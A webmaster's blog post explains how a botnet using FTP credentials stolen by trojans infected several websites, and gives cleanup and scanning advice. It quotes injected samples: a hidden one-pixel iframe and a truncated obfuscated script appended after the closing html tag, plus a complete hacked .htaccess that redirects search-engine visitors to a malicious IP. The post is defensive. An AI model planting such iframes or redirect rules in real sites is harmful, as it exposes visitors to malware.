I have recently seen several websites that I maintain, as well as several that I don’t maintain, hacked by some kind of bot net. It has been a really good learning experience to say the least.

Most of the hacked websites were running Wordpress, so my first thought that it was some kind of security exploit in Wordpress. Then I was asked to investigate of a few static HTML or PHP driven websites without Wordpress installations. All of the hacks were very similar and had their index.php, index.html, and .htaccess files modified. In the index.php and index.html files there was javascript code and iframe virus codes appended to the end of the file that would try to install different variants of badware/malware to unsuspecting visitors. I even seen a file that had stripped out part of the code within the file and replaced it with the malicious javascript and  iframe virus browser exploits. Therefore completely breaking the file (luckily we had a backup of the now broken file and were able to to get the site working again.)

The funny thing is that some of the these exploits were done sloppily and actually exposed the malicious code that was appended to the end of the file. The malicious code had been placed at the end of the file right after the </html> tag.

Here is how the code looked:

</html>iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>

or

</html>script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){... (which would then show all of the html in the hack)

Instead of:
</html><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>

or

</html><script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){...

After removing the infected code from the files the hackers went after the .htaccess files of some of the websites by downloading, deleting and re-uploading the new file with redirects (sometimes 2-3 times a day.) So that if someone performs a search on Google (or most of its competitors) and your website comes up for a searched term, the unsuspecting user would be redirected to a porn website or a malicious website serving up viruses and badware etc.

Example of hacked .htaccess file:

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]

Upon investigation, I found out that the hacks may have come from some kind of spyware or trojan installed a clients  or a coworkers computer. The spyware  looks for ftp user names and passwords on the computer that it has infected. It logs into your server via ftp (using several different dynamic ip addresses) and downloads a file (usually .htaccess and index.php files), adds malicious code to the file, deletes the old file on your server, then uploads the new file. The entire process of downloading, deleting, and re-uploading takes around 2 seconds!

To help prevent these attacks. Scan your PC with an updated AV and Malware scanner in safe mode.  From my experience with malware of this nature, the user account passwords are compromised though viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware.  Microsoft recently released an AV/Malware package at: http://www.microsoft.com/security_essentials

More info:

http://www.websitesforsaleworld.co.uk/blog/2010/02/securing-your-wordpress-blog-from-attack/

http://www.techjaws.com/new-php-exploit-on-the-loose/

http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/

http://cyberinsecure.com/researchers-discover-new-cross-browser-exploit-that-affects-all-major-desktop-platforms/

http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/